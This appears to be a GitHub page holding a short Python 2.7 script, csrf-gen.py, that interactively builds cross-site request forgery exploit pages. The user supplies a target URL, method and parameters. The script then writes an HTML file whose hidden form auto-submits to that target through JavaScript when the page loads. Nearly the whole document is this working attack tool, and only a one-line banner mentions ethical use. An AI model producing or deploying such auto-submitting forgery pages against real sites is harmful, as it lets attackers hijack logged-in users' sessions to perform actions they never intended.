-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathcsrf-gen.py
86 lines (69 loc) · 2.6 KB
/
csrf-gen.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import urllib
import base64
def print_banner():
print("\n" + "-"*50)
print(" CSRF Exploit Generator - By Python 2.7")
print(" Cross-Site Request Forgery Exploit Tool")
print(" Use responsibly for ethical hacking and testing.")
print("-" * 50 + "\n")
def get_input(prompt, default_value=None):
user_input = raw_input(prompt)
if user_input.strip() == "":
if default_value:
return default_value
else:
return None
return user_input.strip()
def generate_csrf_form(url, method, post_data):
print("\nGenerating CSRF Exploit Form...")
csrf_form = """<html>
<head>
<title>CSRF Exploit</title>
</head>
<body>
<h2>CSRF Exploit Generated</h2>
<form id="csrf_form" action="{url}" method="{method}">
""".format(url=url, method=method)
for param, value in post_data.items():
csrf_form += """<input type="hidden" name="{param}" value="{value}">""".format(param=param, value=value)
csrf_form += """
</form>
<script type="text/javascript">
document.getElementById('csrf_form').submit();
</script>
</body>
</html>
"""
return csrf_form
def main():
print_banner()
target_url = get_input("Enter the target URL (e.g., http://site.com/upload.php): ")
if not target_url:
print("No target URL provided. Exiting...")
sys.exit(1)
method = get_input("Enter the HTTP method (GET/POST): ", default_value="POST")
post_data = {}
while True:
param = get_input("Enter POST parameter name (or 'done' to finish): ")
if param and param.lower() == "done":
break
elif param is None:
print("You did not enter any parameter. Please try again.")
continue
elif param.strip() == "":
print("Parameter name cannot be empty. Please try again.")
continue
value = get_input("Enter value for parameter '{}': ".format(param))
post_data[param] = value
csrf_form = generate_csrf_form(target_url, method, post_data)
file_name = get_input("Enter the name of the HTML file to save the exploit (e.g., exploit.html): ")
if not file_name.endswith(".html"):
file_name += ".html"
with open(file_name, "w") as f:
f.write(csrf_form)
print("\nCSRF Exploit Form generated and saved to '{}' successfully!\n".format(file_name))
if __name__ == "__main__":
main()